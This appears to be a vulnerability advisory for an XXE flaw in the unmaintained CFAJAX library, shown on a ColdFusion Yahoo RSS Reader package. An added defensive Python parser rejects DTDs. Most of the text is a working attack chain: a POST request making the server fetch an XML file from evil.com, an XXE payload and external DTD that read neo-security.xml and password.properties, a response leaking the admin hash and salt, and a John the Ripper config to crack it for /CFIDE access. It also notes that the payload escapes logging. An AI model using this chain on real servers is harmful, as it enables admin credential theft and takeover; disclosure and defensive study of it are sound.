Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in a few packages that CFAJAX provides; below is an example of exploiting it in Yahoo RSS Reader. The vulnerability is not limited to this software but affects any software that uses CFAJAX.
Unfortunately CFAJAX is no longer maintained (the last version came out on Nov 21st 2005) and emails sent to the author go unanswered, but it is still found on several web sites on the Internet.
Technical Details
The vulnerability is exploited by supplying an XML file to the CFAJAX-based program, whose XML handling is vulnerable to XXE (XML External Entity injection). The XXE allows us to read locally stored files, in our example neo-security.xml and password.properties, whose contents we can then crack (by brute force) to gain access to the ColdFusion administrative panel.
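A hardened consumer of the feed URL, as an added example that is not part of the advisory or of CFAJAX: the parser refuses any DOCTYPE before the internal subset is read and aborts instead of fetching an external entity, so a document shaped like the payload in the Exploit section is rejected rather than leaking files. It uses Python's standard expat binding rather than ColdFusion, and the two sample feeds are constructed with placeholder paths and hosts.

```python
import xml.parsers.expat

# Constructed samples (not from the advisory): a benign feed, and one carrying
# the kind of DTD the advisory's step 2 payload uses, with placeholder paths/hosts.
SAFE_FEED = ('<?xml version="1.0"?><rss version="2.0"><channel><title>T</title>'
             '<item><title>first</title></item><item><title>second</title></item>'
             '</channel></rss>')
XXE_FEED = ('<?xml version="1.0"?><!DOCTYPE rss [ '
            '<!ENTITY % f SYSTEM "file:///PLACEHOLDER/lib/neo-security.xml"> '
            '<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/x.dtd"> %dtd; ]>'
            '<rss version="2.0"><channel><item><title>&all;</title></item>'
            '</channel></rss>')

class DoctypeRejected(Exception):
    """The feed carried a DTD; that is where XXE entity declarations live."""

def parse_rss_titles(xml_text: str) -> list:
    """Return the <item><title> values of an RSS feed, refusing any DOCTYPE
    before its internal subset is read and aborting on any external entity."""
    p = xml.parsers.expat.ParserCreate()
    titles, path, buf = [], [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in a feed")

    def on_external_entity(context, base, sysid, pubid):
        return 0  # 0 makes expat stop; nothing is fetched from disk or network

    def on_start(name, attrs):
        path.append(name)
        buf.clear()

    def on_end(name):
        if path[-2:] == ["item", "title"]:
            titles.append("".join(buf).strip())
        path.pop()

    p.StartDoctypeDeclHandler = on_doctype
    p.ExternalEntityRefHandler = on_external_entity
    p.StartElementHandler = on_start
    p.EndElementHandler = on_end
    p.CharacterDataHandler = buf.append
    p.Parse(xml_text, True)
    return titles

def feed_is_safe(xml_text: str) -> bool:
    """True only if the document parses without a DTD or external entity."""
    try:
        parse_rss_titles(xml_text)
        return True
    except (DoctypeRejected, xml.parsers.expat.ExpatError):
        return False
```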
Exploit
1. Send one HTTP POST request to a vulnerable server. The exploit data will not be logged (by default, POST request payloads are not logged); only the URL being accessed is.
POST /ajax/app/yahoo/functions.cfm?null.yahooGroupRssFeedReader HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
Host: localhost
Content-Length: 213
Content-Type: application/x-www-form-urlencoded

ajax=true&clientAuthenticationKey=&callCount=1&c0-scriptName=null&c0-methodName=yahooGroupRssFeedReader&c0-id=8176_1433507473868&c0-param0=string:http://evil.com/cf-92655311.xml&c0-param1=number:10&xml=true&
2. Content of cf-92655311.xml listed below:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE rss [
  <!ENTITY % xxe-hash SYSTEM "file:///ColdFusion11/cfusion/lib/neo-security.xml">
  <!ENTITY % xxe-salt SYSTEM "file:///ColdFusion11/cfusion/lib/password.properties">
  <!ENTITY % end "]]>" >
  <!ENTITY % start "<![CDATA[" >
  <!ENTITY % dtd SYSTEM "http://evil.com/cdata-xxe.dtd">
  %dtd;
]>
<rss version="2.0">
  <channel>
    <title>T</title>
    <link>L</link>
    <description>D</description>
    <item>
      <title>TT</title>
      <link>LL</link>
      <description>&all;</description>
    </item>
  </channel>
</rss>
3. Content of cdata-xxe.dtd listed below:
<!ENTITY all "%start;%xxe-hash;%xxe-salt;%end;">
4. You should receive a response like this:
HTTP/1.1 200 OK
Date: Fri, 18 Sep 2015 16:05:02 GMT
Server: nginx
Content-Type: text/html;charset=UTF-8
Content-Length: 1767
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 01 Jan 2005 05:00:00 GMT
X-Powered-By: ASP.NET
Set-Cookie: CFID=201800; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly
Set-Cookie: CFTOKEN=; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly
Vary: Accept-Encoding

****/
var _8176_123123123 = null;
_8176_123123123213 = [ { AUTHOR:' ',DESCRIPTION:' <wddxPacket version=\'1.0\'><header/><data><struct type=\'coldfusion.server.ConfigMap\'><var name=\'admin.userid.root\'><string>admin</string></var><var name=\'rds.security.enabled\'><string>true</string></var><var name=\'rds.security.usesinglerdspassword\'><boolean value=\'true\'/></var><var name=\'allowconcurrentadminlogin\'><boolean value=\'true\'/></var><var name=\'admin.userid.required\'><boolean value=\'false\'/></var><var name=\'allowedAdminIPList\'><string></string></var><var name=\'secureprofile.enabled\'><boolean value=\'false\'/></var><var name=\'CrossSiteScriptPatterns\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'<\\s*(object|embed|script|applet|meta)\'><string><InvalidTag</string></var></struct></var><var name=\'contexts\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'/\'><struct type=\'coldfusion.server.ConfigMap\'></struct></var></struct></var><var name=\'rds.enabled\'><string>false</string></var><var name=\'sbs.security.enabled\'><boolean value=\'false\'/></var><var name=\'admin.userid.root.salt\'><string>PASSWORDSALTHERE</string></var><var name=\'admin.security.enabled\'><boolean value=\'true\'/></var><var name=\'AuthorizedUsers\'><struct type=\'coldfusion.util.FastHashtable\'></struct></var></struct></data></wddxPacket>\n#Tue Sep 30 05:34:21 PDT 2014\nrdspassword=\npassword=PASSWORDHASHHERE\nencrypted=true\n ',LINK:' --3-- ',PUBDATE:' ',PUBTIME:' ',TITLE:' --2-- ' } ]
DWREngine._handleResponse('8176_12312312323', _8176_123123123123, true, true, true);
/* EOF CFAJAX */
5. Extract the salt and password values from the response: the salt follows admin.userid.root.salt\'><string>... and the hash follows \npassword=...
6. Now that you have the salt and password, you can crack the password by following these instructions:
The hash is the password variable from ./lib/password.properties.
The salt is the admin.userid.root.salt variable from ./lib/neo-security.xml.
Configuration file for John the Ripper:
[List.Generic:dynamic_1588]
Expression=sha256($salt.sha1($pass)) (ColdFusion 11)
Flag=MGF_INPUT_32_BYTE
Flag=MGF_SALTED
Flag=MGF_FLAT_BUFFERS
Flag=MGF_BASE_16_OUTPUT_UPCASE
Func=DynamicFunc__clean_input_kwik
Func=DynamicFunc__clean_input2_kwik
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys2
Func=DynamicFunc__SHA1_crypt_input2_append_input1
Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
Test=$dynamic_1588$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234
7. Recover the password and go to the admin console (/CFIDE URL).